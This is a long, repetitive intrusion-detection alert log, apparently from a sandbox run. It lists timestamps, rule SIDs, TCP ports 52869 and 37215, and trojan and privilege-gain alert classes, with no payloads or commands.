                      Timestamp:07/20/24-23:05:35.297940
                      SID:2027339
                      Source Port:59544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.809385
                      SID:2027339
                      Source Port:40522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.631877
                      SID:2829579
                      Source Port:59190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.376608
                      SID:2829579
                      Source Port:60270
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.456840
                      SID:2831300
                      Source Port:33976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2829579
                      Source Port:40044
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.877705
                      SID:2027339
                      Source Port:36992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.365995
                      SID:2027339
                      Source Port:49596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.998297
                      SID:2025132
                      Source Port:39896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:26.155233
                      SID:2027339
                      Source Port:41508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.329793
                      SID:2829579
                      Source Port:35312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.525575
                      SID:2831300
                      Source Port:34864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.455250
                      SID:2831300
                      Source Port:42492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.387430
                      SID:2829579
                      Source Port:47912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.733116
                      SID:2025132
                      Source Port:49876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.035056
                      SID:2027339
                      Source Port:54166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.520062
                      SID:2025132
                      Source Port:40034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.466981
                      SID:2835222
                      Source Port:35392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.190387
                      SID:2025132
                      Source Port:34542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2835222
                      Source Port:35232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.412182
                      SID:2025132
                      Source Port:37302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:53.637724
                      SID:2025132
                      Source Port:43198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:35.012567
                      SID:2027339
                      Source Port:48080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.523045
                      SID:2025132
                      Source Port:50246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.487901
                      SID:2027339
                      Source Port:55318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.457748
                      SID:2027339
                      Source Port:39574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.088545
                      SID:2829579
                      Source Port:48774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.983769
                      SID:2831300
                      Source Port:60934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.403603
                      SID:2025132
                      Source Port:45142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.316014
                      SID:2027339
                      Source Port:60050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.635185
                      SID:2027339
                      Source Port:47194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.981585
                      SID:2025132
                      Source Port:36402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.486746
                      SID:2831300
                      Source Port:48424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.911827
                      SID:2027339
                      Source Port:55208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.304036
                      SID:2025132
                      Source Port:46490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.441411
                      SID:2025132
                      Source Port:39022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.220141
                      SID:2027339
                      Source Port:55888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.049331
                      SID:2027339
                      Source Port:34080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.412130
                      SID:2829579
                      Source Port:59562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.854548
                      SID:2027339
                      Source Port:36606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.978394
                      SID:2831300
                      Source Port:40892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.484078
                      SID:2025132
                      Source Port:36022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.369631
                      SID:2027339
                      Source Port:46836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.325933
                      SID:2831300
                      Source Port:42868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.332694
                      SID:2027339
                      Source Port:42004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.394269
                      SID:2027339
                      Source Port:44922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.570741
                      SID:2831300
                      Source Port:60062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:02.684157
                      SID:2025132
                      Source Port:52104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2829579
                      Source Port:50262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.685689
                      SID:2025132
                      Source Port:33602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.804757
                      SID:2025132
                      Source Port:42824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.440287
                      SID:2027339
                      Source Port:34340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.462705
                      SID:2831300
                      Source Port:60936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.376608
                      SID:2829579
                      Source Port:50166
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.165979
                      SID:2831300
                      Source Port:58318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:42.331305
                      SID:2025132
                      Source Port:49188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.355766
                      SID:2027339
                      Source Port:38406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.037207
                      SID:2025132
                      Source Port:52126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:35.375826
                      SID:2025132
                      Source Port:59080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.542034
                      SID:2835222
                      Source Port:35914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.554753
                      SID:2027339
                      Source Port:48030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.055909
                      SID:2835222
                      Source Port:57374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.877705
                      SID:2831300
                      Source Port:40160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.793654
                      SID:2025132
                      Source Port:56948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.457622
                      SID:2027339
                      Source Port:55076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.378832
                      SID:2835222
                      Source Port:39974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.398358
                      SID:2027339
                      Source Port:36878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.748553
                      SID:2835222
                      Source Port:51182
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.357307
                      SID:2027339
                      Source Port:40834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2835222
                      Source Port:54782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.426771
                      SID:2025132
                      Source Port:38422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.119988
                      SID:2027339
                      Source Port:55248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.018611
                      SID:2027339
                      Source Port:42026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.864515
                      SID:2831300
                      Source Port:36648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.272029
                      SID:2831300
                      Source Port:52522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.035942
                      SID:2829579
                      Source Port:59074
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.253105
                      SID:2831300
                      Source Port:39838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.361541
                      SID:2831300
                      Source Port:35728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2829579
                      Source Port:43300
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.404140
                      SID:2027339
                      Source Port:34824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.747598
                      SID:2025132
                      Source Port:50650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.542495
                      SID:2831300
                      Source Port:37638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.572173
                      SID:2027339
                      Source Port:59390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.512033
                      SID:2025132
                      Source Port:51666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.353037
                      SID:2027339
                      Source Port:55696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2835222
                      Source Port:49568
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2829579
                      Source Port:52176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257817
                      SID:2835222
                      Source Port:42258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.457796
                      SID:2025132
                      Source Port:59522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.602976
                      SID:2027339
                      Source Port:46430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.468265
                      SID:2831300
                      Source Port:39088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.940214
                      SID:2831300
                      Source Port:60852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.153687
                      SID:2027339
                      Source Port:54446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.188540
                      SID:2027339
                      Source Port:33034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.413785
                      SID:2025132
                      Source Port:40548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.447627
                      SID:2027339
                      Source Port:49590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.697115
                      SID:2025132
                      Source Port:52434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.786611
                      SID:2025132
                      Source Port:53968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.439699
                      SID:2831300
                      Source Port:60366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.011461
                      SID:2829579
                      Source Port:47376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.920702
                      SID:2831300
                      Source Port:37972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.812610
                      SID:2027339
                      Source Port:43380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.291407
                      SID:2831300
                      Source Port:54262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.469684
                      SID:2027339
                      Source Port:39906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.453622
                      SID:2027339
                      Source Port:42562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.510455
                      SID:2829579
                      Source Port:45548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.581336
                      SID:2025132
                      Source Port:40438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.486141
                      SID:2025132
                      Source Port:56316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.785367
                      SID:2027339
                      Source Port:48100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.309569
                      SID:2831300
                      Source Port:47994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.210098
                      SID:2027339
                      Source Port:32952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.575243
                      SID:2027339
                      Source Port:54514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.517784
                      SID:2027339
                      Source Port:48470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.374064
                      SID:2025132
                      Source Port:56186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.807124
                      SID:2829579
                      Source Port:58450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.475330
                      SID:2027339
                      Source Port:35574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.441223
                      SID:2831300
                      Source Port:57384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.528818
                      SID:2831300
                      Source Port:38778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.306586
                      SID:2027339
                      Source Port:48700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.248451
                      SID:2025132
                      Source Port:57812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.287042
                      SID:2027339
                      Source Port:47218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.347952
                      SID:2025132
                      Source Port:51988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2829579
                      Source Port:57044
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.827209
                      SID:2835222
                      Source Port:43638
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.385840
                      SID:2027339
                      Source Port:58658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625707
                      SID:2835222
                      Source Port:54276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2835222
                      Source Port:37488
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.090337
                      SID:2027339
                      Source Port:47796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2027339
                      Source Port:45708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2829579
                      Source Port:56252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2829579
                      Source Port:36990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.527690
                      SID:2831300
                      Source Port:34258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.446932
                      SID:2831300
                      Source Port:37440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.217467
                      SID:2025132
                      Source Port:49408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.556779
                      SID:2027339
                      Source Port:44754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2829579
                      Source Port:38480
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.419849
                      SID:2835222
                      Source Port:58556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.005196
                      SID:2025132
                      Source Port:50148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.445692
                      SID:2027339
                      Source Port:39124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.433951
                      SID:2025132
                      Source Port:52954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.120842
                      SID:2027339
                      Source Port:50658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2835222
                      Source Port:60790
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.374360
                      SID:2831300
                      Source Port:34550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:58.157771
                      SID:2027339
                      Source Port:49384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440397
                      SID:2027339
                      Source Port:58954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.556801
                      SID:2027339
                      Source Port:39346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.650758
                      SID:2831300
                      Source Port:50404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.426127
                      SID:2027339
                      Source Port:60616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.527430
                      SID:2831300
                      Source Port:48194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.181050
                      SID:2025132
                      Source Port:55968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2835222
                      Source Port:49642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:44.210907
                      SID:2027339
                      Source Port:39282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2835222
                      Source Port:54656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2835222
                      Source Port:40210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2835222
                      Source Port:52930
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.370742
                      SID:2027339
                      Source Port:32854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.287798
                      SID:2027339
                      Source Port:53836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.811975
                      SID:2025132
                      Source Port:40138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.074396
                      SID:2027339
                      Source Port:37698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.497508
                      SID:2027339
                      Source Port:38676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.220682
                      SID:2835222
                      Source Port:39900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.346058
                      SID:2027339
                      Source Port:50852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2835222
                      Source Port:49822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.436745
                      SID:2025132
                      Source Port:41226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:47.118980
                      SID:2027339
                      Source Port:43388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.913786
                      SID:2027339
                      Source Port:57222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.355668
                      SID:2027339
                      Source Port:55890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.587283
                      SID:2831300
                      Source Port:57730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.341196
                      SID:2831300
                      Source Port:40486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.554950
                      SID:2831300
                      Source Port:55604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.459218
                      SID:2831300
                      Source Port:33526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.207362
                      SID:2025132
                      Source Port:48594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.715968
                      SID:2027339
                      Source Port:58350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.903875
                      SID:2831300
                      Source Port:55796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.423413
                      SID:2831300
                      Source Port:60260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:10.376181
                      SID:2831300
                      Source Port:56868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.351353
                      SID:2025132
                      Source Port:43872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:31.562284
                      SID:2025132
                      Source Port:40914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.571724
                      SID:2027339
                      Source Port:49986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2835222
                      Source Port:37688
                      Destination Port:37215
